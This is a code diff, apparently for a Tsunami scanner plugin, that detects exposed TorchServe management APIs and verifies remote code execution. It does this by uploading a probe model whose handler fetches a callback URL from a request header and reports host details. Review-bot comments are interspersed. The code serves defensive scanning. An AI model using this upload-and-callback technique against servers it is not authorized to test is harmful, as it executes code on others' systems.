+import com.google.tsunami.proto.VulnerabilityId;
+import java.time.Clock;
+import java.time.Instant;
+import javax.inject.Inject;
+
+@PluginInfo(
+ type = PluginType.VULN_DETECTION,
+ name = "TorchServeManagementApiDetector",
+ version = "0.1",
+ description = "Detects publicly available TorchServe management API with a path to RCE.",
+ author = "Andrew Konstantinov (andrew@doyensec.com)",
+ bootstrapModule =
TorchServeManagementApiDetectorBootstrapModule.class) +@ForWebService +public final class TorchServeManagementApiDetector implements VulnDetector { + private final TorchServeExploiter torchServeExploiter; + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + public static final String REPORT_PUBLISHER = "DOYENSEC"; + public static final String REPORT_ID = "TORCHSERVE_MANAGEMENT_API_RCE"; + public static final String REPORT_TITLE = "TorchServe Management API Remote Code Execution"; + public static final String REPORT_RECOMMENDATION = + "It is strongly recommended to restrict access to the TorchServe Management API, as " + + "public exposure poses significant security risks. The API allows potentially " + + "disruptive interactions with TorchServe, including modifying configurations, " + + "deleting models, and altering resource allocation, which could lead to Denial of " + + "Service (DoS) attacks. \n\n" + + "Particular attention should be given to the possibility of unauthorized code " + + "execution through model uploads. Users must ensure strict control over model " + + "creation to prevent unauthorized or malicious use. Implementing the 'allowed_urls' " + + "option in TorchServe's configuration is critical in this regard. This setting, " + + "detailed at https://pytorch.org/serve/configuration.html#:~:text=allowed_urls, " + + "limits the URLs from which models can be downloaded. \n\n" + + "It is essential to configure 'allowed_urls' as a comma-separated list of " + + "regular expressions that specifically allow only trusted sources. General " + + "whitelisting of large domains (such as entire AWS S3 or GCP buckets) is not " + + "secure. Care must be taken to ensure regex patterns are accurately defined " + + "(e.g., using 'https://models\\.my-domain\\.com/*' instead of " + + "'https://models.my-domain.com/*' to prevent unintended domain matches). 
\n\n" + + "Finally, be aware that the Management API discloses the original URLs of " + + "downloaded models. Attackers could exploit this information to identify " + + "vulnerable download sources or to host malicious models on similarly-named " + + "domains."; + private final Clock utcClock; + + @Inject + public TorchServeManagementApiDetector( + TorchServeExploiter torchServeExploiter, @UtcClock Clock utcClock) { + this.utcClock = checkNotNull(utcClock); + this.torchServeExploiter = checkNotNull(torchServeExploiter); + } + + /** + * Detects vulnerabilities in the given target. Called by Tsunami that handles the port scanning + * and service fingerprinting. + * + * @param targetInfo Information about the target system. + * @param matchedServices List of matched network services. + * @return A list of detection reports. + */ + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + DetectionReportList.Builder reportListBuilder = DetectionReportList.newBuilder(); + + for (NetworkService service : matchedServices) { + try { + TorchServeExploiter.Details details = torchServeExploiter.isServiceVulnerable(service); + logger.atInfo().log("Checking service %s", service); + if (details != null) { + logger.atInfo().log("Found vulnerable service %s", service); + DetectionReport report = buildDetectionReport(targetInfo, service, details); + reportListBuilder.addDetectionReports(report); + } + } catch (Exception e) { + logger.atWarning().withCause(e).log("Error processing service %s", service); + } + } + return reportListBuilder.build(); + } + + /** Builds a vulnerability object. 
*/
+ private Vulnerability buildVulnerability(TorchServeExploiter.Details details) {
+ VulnerabilityId vulnerabilityId =
+ VulnerabilityId.newBuilder().setPublisher(REPORT_PUBLISHER).setValue(REPORT_ID).build();
+ return Vulnerability.newBuilder()
+ .setTitle(REPORT_TITLE)
+ .setDescription(details.generateDescription())
+ .setRecommendation(REPORT_RECOMMENDATION)
+ .addAdditionalDetails(
+ AdditionalDetail.newBuilder()
+ .setDescription("Additional details")
+ .setTextData(
+ TextData.newBuilder().setText(details.generateAdditionalDetails()).build())
+ .build())
+ .setSeverity(details.getSeverity())
+ .setMainId(vulnerabilityId)
+ .build();
+ }
+
+ /**
+ * Builds a detection report for a given target and service.
+ *
+ * @param targetInfo Information about the target.
+ * @param service The network service associated with the vulnerability.
+ * @return The constructed detection report.
+ */
+ private DetectionReport buildDetectionReport(
+ TargetInfo targetInfo, NetworkService service, TorchServeExploiter.Details details) {
+ Vulnerability vulnerability = buildVulnerability(details);
+ return buildDetectionReport(targetInfo, service, vulnerability, details.isVerified());
+ }
+
+ /**
+ * Builds a detection report for a given target, service and vulnerability.
+ *
+ * @param targetInfo
+ * @param service
+ * @param vulnerability
+ * @return The constructed detection report.
+ */
+ private DetectionReport buildDetectionReport(
+ TargetInfo targetInfo,
+ NetworkService service,
+ Vulnerability vulnerability,
+ boolean verified) {
+ DetectionReport report =
+ DetectionReport.newBuilder()
+ .setTargetInfo(targetInfo)
+ .setNetworkService(service)
+ .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli()))
+ .setDetectionStatus(
+ verified
+ ? DetectionStatus.VULNERABILITY_VERIFIED
+ : DetectionStatus.VULNERABILITY_PRESENT)
+ .setVulnerability(vulnerability)
+ .build();
+ return report;
+ }
+}
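Review bot: The Javadoc on the four-argument `buildDetectionReport` has empty `@param targetInfo`, `@param service` and `@param vulnerability` tags and no tag for `verified`, and the three-argument overload does not document `details`; fill them in, e.g. `@param verified whether the exploit was confirmed on the target (selects VULNERABILITY_VERIFIED over VULNERABILITY_PRESENT)`. In `detect`, the `Checking service %s` line is logged after `isServiceVulnerable` returns, so a service whose check throws appears only in the warning; moving that log line above the call gives a complete trace. The regex example in REPORT_RECOMMENDATION, `https://models\\.my-domain\\.com/*`, matches the host followed by zero or more slashes rather than an arbitrary model path, so a user who copies it gets a pattern that is either too narrow or, if TorchServe matches unanchored, too broad; `^https://models\\.my-domain\\.com/.*$` expresses what the sentence intends. How TorchServe applies `allowed_urls` patterns is not visible here, so the anchoring should be confirmed against its documentation before the text is changed.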
diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorBootstrapModule.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorBootstrapModule.java
new file mode 100644
index 000000000..9141e1a78
--- /dev/null
+++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorBootstrapModule.java
@@ -0,0 +1,27 @@
+/*
+ * Copyright 2023 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.rce.torchserve;
+
+import com.google.tsunami.plugin.PluginBootstrapModule;
+
+/** A {@link PluginBootstrapModule} for {@link TorchServeManagementApiDetector}. */
+public final class TorchServeManagementApiDetectorBootstrapModule extends PluginBootstrapModule {
+
+ @Override
+ protected void configurePlugin() {
+ registerPlugin(TorchServeManagementApiDetector.class);
+ }
+}
diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeRandomUtils.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeRandomUtils.java
new file mode 100644
index 000000000..6e2412c58
--- /dev/null
+++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeRandomUtils.java
@@ -0,0 +1,47 @@
+/*
+ * Copyright 2023 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.rce.torchserve;
+
+import java.security.MessageDigest;
+import java.util.UUID;
+
+public class TorchServeRandomUtils {
+ public String getRandomValue() {
+ return UUID.randomUUID().toString();
+ }
+
+ /**
+ * Compares the provided hash with the MD5 hash of the given value.
+ *
+ * @param hash The hash to compare against the expected MD5 hash.
+ * @param randomValue The value used for generating the expected MD5 hash.
+ * @return True if the provided hash matches the MD5 hash of the given value, false otherwise.
+ */
+ public boolean validateHash(String hash, String randomValue) {
+ try {
+ MessageDigest md = MessageDigest.getInstance("MD5");
+ md.update(randomValue.getBytes());
+ byte[] digest = md.digest();
+ StringBuilder sb = new StringBuilder();
+ for (byte b : digest) {
+ sb.append(String.format("%02x", b));
+ }
+ return sb.toString().equals(hash);
+ } catch (Exception e) {
+ throw new RuntimeException(e);
+ }
+ }
+}
diff --git a/doyensec/detectors/rce/torchserve/src/main/resources/model/MAR-INF/MANIFEST.json b/doyensec/detectors/rce/torchserve/src/main/resources/model/MAR-INF/MANIFEST.json
new file mode 100644
index 000000000..af9a33a7c
--- /dev/null
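Review bot: `randomValue.getBytes()` in `validateHash` encodes with the JVM default charset, while the handler in model.py hashes `.encode()` (UTF-8); the two agree for the ASCII UUIDs `getRandomValue` produces, but the method is public and any non-ASCII value would silently fail to validate, so use `md.update(randomValue.getBytes(StandardCharsets.UTF_8));`. The `catch (Exception e)` is wider than the single checked exception `MessageDigest.getInstance` can throw; `catch (NoSuchAlgorithmException e)` keeps any other failure visible instead of wrapping it. A one-line comment that MD5 here is only an echo of the probe value matched against model.py, not an integrity mechanism, would stop a later reader from changing the digest on one side alone.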
+++ b/doyensec/detectors/rce/torchserve/src/main/resources/model/MAR-INF/MANIFEST.json
@@ -0,0 +1,12 @@
+{
+ "runtime": "python",
+ "model": {
+ "modelName": "tsunami-torch-rce-validator",
+ "serializedFile": "serialized.pt",
+ "handler": "model.py",
+ "modelVersion": "1.0"
+ },
+ "modelServerVersion": "1.0",
+ "implementationVersion": "1.0",
+ "specificationVersion": "1.0"
+}
diff --git a/doyensec/detectors/rce/torchserve/src/main/resources/model/model.py b/doyensec/detectors/rce/torchserve/src/main/resources/model/model.py
new file mode 100644
index 000000000..9e27f2323
--- /dev/null
+++ b/doyensec/detectors/rce/torchserve/src/main/resources/model/model.py
@@ -0,0 +1,79 @@
+#!/usr/bin/env python
+
+# Copyright 2023 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+"""
+This Python script is part of a vulnerability detection plugin for Google's Tsunami Security Scanner.
+The plugin is designed to assess the Remote Code Execution (RCE) capability of systems by deploying
+this script as a model in TorchServe. It handles specific HTTP request headers to simulate various
+actions without creating additional attack surface. The script's behaviors include:
+
+- Calculating an MD5 hash for the 'tsunami-execute' header value to simulate command execution.
+- Sending a GET request to a specified URL in the 'tsunami-callback' header to validate data exfiltration.
+- Collecting basic system information in response to the 'tsunami-info' header for aiding vulnerability mitigation.
+- Logging the value of the 'tsunami-log' header to the container's standard output.
+
+This script is a part of an automated testing process and does not perform any malicious activities.
+In case of unexpected termination of the Tsunami plugin, this script may remain on the system.
To verify
+its origin and purpose, please refer to the following repositories:
+
+- Tsunami Security Scanner: https://github.com/google/tsunami-security-scanner
+- Tsunami RCE Plugin for TorchServe: https://github.com/google/tsunami-security-scanner-plugins/tree/master/doyensec/detectors/rce/torchserve
+
+The plugin attempts to clean up by removing the model post-execution, with the primary output being a log entry.
+"""
+
+import hashlib
+import urllib.request
+import platform
+import json
+
+def produce_conformant_output(string, length):
+ """Produce a list of length `length` with `string` as the first element."""
+ return [string] + ["Ok"] * (length - 1)
+
+def handle(data, context):
+ """Handle a request to the model. Echoes the input string, unless special headers are set."""
+ if (context is None) or (data is None):
+ return None
+
+ headers = context.get_all_request_header(0)
+ if headers is None:
+ return data
+
+ response = data[0]
+ if "tsunami-execute" in headers:
+ # Simulate command execution by calculating an MD5 hash of the headers value
+ response = hashlib.md5(headers["tsunami-execute"].encode()).hexdigest()
+ elif "tsunami-callback" in headers:
+ # Validates data exfiltration by sending a GET request to the specified URL
+ try:
+ urllib.request.urlopen(headers["tsunami-callback"])
+ except:
+ pass
+ elif "tsunami-info" in headers:
+ # Collects basic system info to simplify vulnerability mitigation
+ info = {
+ "platform": platform.platform(),
+ "python": platform.python_version(),
+ "hostname": platform.node()
+ }
+ response = json.dumps(info)
+
+ elif "tsunami-log" in headers:
+ # Logs the value of the 'tsunami-log' header to the container's standard output
+ print(headers["tsunami-log"])
+
+ return produce_conformant_output(response, len(data))
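Review bot: The bare `except: pass` around `urllib.request.urlopen` in `handle` swallows every exception, including `KeyboardInterrupt` and `SystemExit`, and the call carries no timeout, so a callback URL that never answers can hold the worker for the platform's default socket timeout. Suggest `urllib.request.urlopen(headers["tsunami-callback"], timeout=10)` (sample value) and `except Exception:` with a comment that a missed callback is detected on the scanner side, not here. The `print(headers["tsunami-log"])` line depends on the worker's stdout being unbuffered; `print(headers["tsunami-log"], flush=True)` makes the entry appear regardless, though how TorchServe captures worker stdout is not visible here.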
diff --git a/doyensec/detectors/rce/torchserve/src/main/resources/model/serialized.pt b/doyensec/detectors/rce/torchserve/src/main/resources/model/serialized.pt
new file mode 100644
index 000000000..e69de29bb
diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeExploiter.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeExploiter.java
new file mode 100644
index 000000000..79adb92d2
--- /dev/null
+++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeExploiter.java
@@ -0,0 +1,47 @@
+/*
+ * Copyright 2023 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.rce.torchserve;
+
+import com.google.tsunami.common.net.http.HttpClient;
+import com.google.tsunami.plugin.payload.PayloadGenerator;
+import com.google.tsunami.proto.NetworkService;
+import javax.inject.Inject;
+import org.checkerframework.checker.nullness.qual.Nullable;
+
+/**
+ * A mock TorchServeExploiter that allows us to set the Details object returned by the
+ * isServiceVulnerable method.
+ */
+public class MockTorchServeExploiter extends TorchServeExploiter {
+ @Inject
+ public MockTorchServeExploiter(
+ TorchServeManagementApiConfig config,
+ TorchServeManagementApiArgs args,
+ HttpClient httpClient,
+ PayloadGenerator payloadGenerator,
+ TorchServeManagementAPIExploiterWebServer webServer,
+ TorchServeRandomUtils randomUtils) {
+ super(config, args, httpClient, payloadGenerator, webServer, randomUtils);
+ }
+
+ public boolean returnNullDetails = false;
+
+ // Override the method to return the mock details
+ @Override
+ public @Nullable Details isServiceVulnerable(NetworkService service) {
+ return returnNullDetails ? null : this.details;
+ }
+}
diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeManagementApiExploiterWebServer.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeManagementApiExploiterWebServer.java
new file mode 100644
index 000000000..c2e3df78b
--- /dev/null
+++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeManagementApiExploiterWebServer.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright 2023 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.rce.torchserve;
+
+public class MockTorchServeManagementApiExploiterWebServer
+ extends TorchServeManagementAPIExploiterWebServer {
+ private boolean started = false;
+ private boolean stopped = false;
+ private String startedHostname = null;
+ private int startedPort = -1;
+
+ @Override
+ public void start(String hostname, int port) {
+ this.started = true;
+ this.startedHostname = hostname;
+ this.startedPort = port;
+ }
+
+ @Override
+ public void stop() {
+ this.stopped = true;
+ }
+
+ public boolean isStarted() {
+ return started;
+ }
+
+ public boolean isStopped() {
+ return stopped;
+ }
+
+ public String getStartedHostname() {
+ return startedHostname;
+ }
+
+ public int getStartedPort() {
+ return startedPort;
+ }
+}
diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeRandomUtils.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeRandomUtils.java
new file mode 100644
index 000000000..4e058b16e
--- /dev/null
+++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeRandomUtils.java
@@ -0,0 +1,22 @@
+/*
+ * Copyright 2023 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.rce.torchserve;
+
+public class MockTorchServeRandomUtils extends TorchServeRandomUtils {
+ public boolean validateHash(String hash, String randomValue) {
+ return true;
+ }
+}
diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTest.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTest.java
new file mode 100644
index 000000000..8214580ba
--- /dev/null
+++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTest.java
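Review bot: `validateHash` in MockTorchServeRandomUtils overrides the superclass method without `@Override`, so a later change to the real signature would leave this stub as a dead overload and the tests would silently fall back to real MD5 validation. Add `@Override` above the method, plus a one-line comment such as `// Accepts any hash so exploiter tests need not compute the MD5 echo themselves.` so the unconditional `return true` reads as intentional.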
@@ -0,0 +1,195 @@
+/*
+ * Copyright 2023 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.rce.torchserve;
+
+import static com.google.common.truth.Truth.assertThat;
+import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort;
+
+import com.google.tsunami.proto.NetworkService;
+import com.google.tsunami.proto.Severity;
+import com.google.tsunami.proto.Software;
+import com.google.tsunami.proto.TransportProtocol;
+import java.io.IOException;
+import javax.inject.Inject;
+import okhttp3.mockwebserver.MockResponse;
+import org.checkerframework.checker.nullness.qual.Nullable;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import org.junit.runners.JUnit4;
+
+@RunWith(JUnit4.class)
+public final class TorchServeExploiterTest extends TorchServeManagementApiTestBase {
+ @Inject private TorchServeExploiter exploiter;
+
+ NetworkService service;
+
+ @Before
+ public void setUpNetworkService() {
+ service =
+ NetworkService.newBuilder()
+ .setNetworkEndpoint(
+ forHostnameAndPort(mockTorchServe.getHostName(), mockTorchServe.getPort()))
+ .setTransportProtocol(TransportProtocol.TCP)
+ .setSoftware(Software.newBuilder().setName("torchserve"))
+ .setServiceName("http")
+ .build();
+ }
+
+ private void enqueueMockTorchServeResponse(String response) {
+ mockTorchServe.enqueue(new MockResponse().setResponseCode(200).setBody(response));
+ }
+
+ private
String API_DESCRIPTION_RESPONSE = + "{\n" + + " \"openapi\": \"3.0.1\",\n" + + " \"info\": {\n" + + " \"title\": \"TorchServe APIs\",\n" + + " \"description\": \"TorchServe is a flexible and easy to use tool for serving deep" + + " learning models\",\n" + + " \"version\": \"0.8.1\"\n" + + " },\n" + + " \"paths\": {\n" + + " \"/models\": {\n" + + " \"post\": {\n" + + " \"description\": \"Register a new model in TorchServe.\",\n" + + " \"operationId\": \"registerModel\"\n" + + " }\n" + + " }\n" + + " }\n" + + "}"; + + private String EMPTY_MODELS_RESPONSE = "{\"models\": []}"; + + private String getCustomizedMetadataResponse(@Nullable String metadata) { + return "[{ \"customizedMetadata\" : \"" + (metadata == null ? "" : metadata) + "\" }]"; + } + + @Test + public void isServiceVulnerable_ifServiceIsNotTorchServe_returnsNull() throws IOException { + // This is template of Inference API response not Management API (no POST /models) + enqueueMockTorchServeResponse( + "{\n" + + " \"openapi\": \"3.0.1\",\n" + + " \"info\": {\n" + + " \"title\": \"TorchServe APIs\",\n" + + " \"description\": \"TorchServe is a flexible and easy to use tool for serving" + + " deep learning models\",\n" + + " \"version\": \"0.8.1\"\n" + + " },\n" + + " \"paths\": {\n" + + " \"/metrics\": {\n" + + " \"get\": {\n" + + " \"description\": \"Get TorchServe application metrics in prometheus" + + " format.\",\n" + + " \"operationId\": \"metrics\"\n" + + " }\n" + + " }\n" + + " }\n" + + "}"); + assertThat(exploiter.isServiceVulnerable(service)).isNull(); + } + + @Test + public void isServiceVulnerable_ifServiceIsVulnerableBasic_returnsDetails() throws IOException { + enqueueMockTorchServeResponse(API_DESCRIPTION_RESPONSE); + // Generate the JSON response with the array of models: + // "models": [ + // { + // "modelName": "squeezenet1_1", + // "modelUrl": "https://torchserve.pytorch.org/mar_files/squeezenet1_1.mar" + // }, + mockTorchServe.enqueue( + new MockResponse() + .setResponseCode(200) + 
.setBody( + "{\"models\": [\n" + + "{\n" + + " \"status\": \"SUCCESS\",\n" + + " \"modelName\": \"squeezenet1_1\",\n" + + " \"modelUrl\":" + + " \"https://torchserve.pytorch.org/mar_files/squeezenet1_1.mar\"\n" + + "}]}")); + + TorchServeExploiter.Details details = exploiter.isServiceVulnerable(service); + + assertThat(details).isNotNull(); + assertThat(details.models).containsExactly("squeezenet1_1"); + assertThat(details.getSeverity()).isEqualTo(Severity.LOW); + assertThat(details.isVerified()).isFalse(); + assertThat(details.generateDescription()) + .isEqualTo( + "An exposed TorchServe management API was detected on the target. TorchServe is a model" + + " server for PyTorch models. The management API allows adding new models to the" + + " server which by design can be used to execute arbitrary code on the target.\n" + + "This exposure poses a significant security risk as it could allow unauthorized" + + " users to run arbitrary code on the server."); + assertThat(details.generateAdditionalDetails()) + .isEqualTo( + "Callback verification is not enabled in Tsunami configuration, so the exploit could" + + " not be confirmed and only the Management API detection is reported. 
It is" + + " recommended to enable callback verification for more conclusive vulnerability" + + " assessment.\n" + + "Models found on the target:\n" + + " - squeezenet1_1"); + } + + @Test + public void isServiceVulnerable_successfulExploitInStaticMode() throws IOException { + // Setup the details for STATIC mode + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.STATIC; + exploiter.details.staticUrl = "http://mock-static-url.com/model.mar"; + + enqueueMockTorchServeResponse(API_DESCRIPTION_RESPONSE); + + // Mocking the response for listing models - assuming an empty list for simplicity + enqueueMockTorchServeResponse(EMPTY_MODELS_RESPONSE); + + // Mocking the response for removeModelByUrl + enqueueMockTorchServeResponse(EMPTY_MODELS_RESPONSE); + + // Mocking the response for model registration + mockTorchServe.enqueue( + new MockResponse() + .setResponseCode(200) + .setBody( + "{\n" + + " \"status\": \"Model \\\"squeezenet1_1\\\" Version: 1.0 registered with 1" + + " initial workers\"\n" + + "}")); + + // Mocking the response for model list to confirm the model was registered + enqueueMockTorchServeResponse(""); + + // Mocking the response to hash verification request + enqueueMockTorchServeResponse(getCustomizedMetadataResponse(null)); + + // Mocking the response to adding a log file + enqueueMockTorchServeResponse(getCustomizedMetadataResponse(null)); + + // Mocking the response to system info request + enqueueMockTorchServeResponse(getCustomizedMetadataResponse("{}")); + + // Perform the exploitation test + TorchServeExploiter.Details details = exploiter.isServiceVulnerable(service); + + // Assertions + assertThat(details).isNotNull(); + assertThat(details.exploitationMode).isEqualTo(TorchServeExploiter.ExploitationMode.STATIC); + assertThat(details.exploitUrl).isEqualTo(exploiter.details.staticUrl); + assertThat(details.isVerified()).isTrue(); + } +} 
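Review bot: `API_DESCRIPTION_RESPONSE` and `EMPTY_MODELS_RESPONSE` are named as constants but declared as non-final instance fields, and they sit after the methods that use them; `private static final String API_DESCRIPTION_RESPONSE =` (and likewise for the other) at the top of the class matches the naming and the file's style. `isServiceVulnerable_successfulExploitInStaticMode` enqueues a response for each request the exploiter makes but asserts only on the returned `Details`, so nothing pins that the probe model is unregistered from the target once verification completes; draining `mockTorchServe.takeRequest()` and asserting on the method and path of the final request would catch a regression that leaves the model deployed. The exact request sequence is defined in TorchServeExploiter, outside this hunk, so the expected path has to be taken from there.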
diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTestWithCallback.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTestWithCallback.java
new file mode 100644
index 000000000..a9d185c42
--- /dev/null
+++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTestWithCallback.java
@@ -0,0 +1,108 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import static com.google.common.truth.Truth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Software; +import com.google.tsunami.proto.TransportProtocol; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockResponse; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +@RunWith(JUnit4.class) +public class TorchServeExploiterTestWithCallback + extends TorchServeManagementApiTestBaseWithCallbackServer { + @Inject private TorchServeExploiter exploiter; + NetworkService service; + + public void onTestExecution() { + setUpNetworkService(); + setUpMockServices(); + } + + private void setUpNetworkService() { + service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTorchServe.getHostName(), mockTorchServe.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("torchserve")) + .setServiceName("http") + .build(); + } + + public void setUpMockServices() { + mockTorchServe.enqueue( + new MockResponse() + .setResponseCode(200) + .setBody( + "{\n" + + " \"openapi\": 
\"3.0.1\",\n" + + " \"info\": {\n" + + " \"title\": \"TorchServe APIs\",\n" + + " \"description\": \"TorchServe is a flexible and easy to use tool for" + + " serving deep learning models\",\n" + + " \"version\": \"0.8.1\"\n" + + " },\n" + + " \"paths\": {\n" + + " \"/models\": {\n" + + " \"post\": {\n" + + " \"description\": \"Register a new model in TorchServe.\",\n" + + " \"operationId\": \"registerModel\"\n" + + " }\n" + + " }\n" + + " }\n" + + "}")); + + // Mocking the response for listing models - assuming an empty list for simplicity + mockTorchServe.enqueue(new MockResponse().setResponseCode(200).setBody("{\"models\": []}")); + + // Mocking the response for removeModelByUrl + mockTorchServe.enqueue(new MockResponse().setResponseCode(200).setBody("{\"models\": []}")); + + // Mocking the response for model registration + mockTorchServe.enqueue( + new MockResponse() + .setResponseCode(200) + .setBody( + "{\n" + + " \"status\": \"Model \\\"squeezenet1_1\\\" Version: 1.0 registered with 1" + + " initial workers\"\n" + + "}")); + } + + @Test + public void details_isServiceVulnerableReturnsNullIfCallbackNotTriggered() throws Exception { + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.SSRF; + assertThat(exploiter.isServiceVulnerable(service)).isNull(); + } + + @Test + public void detect_isServiceVulnerable_returnsDetailsIfCallbackTriggered() throws Exception { + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.SSRF; + assertThat(exploiter.isServiceVulnerable(service)).isNotNull(); + } +} 
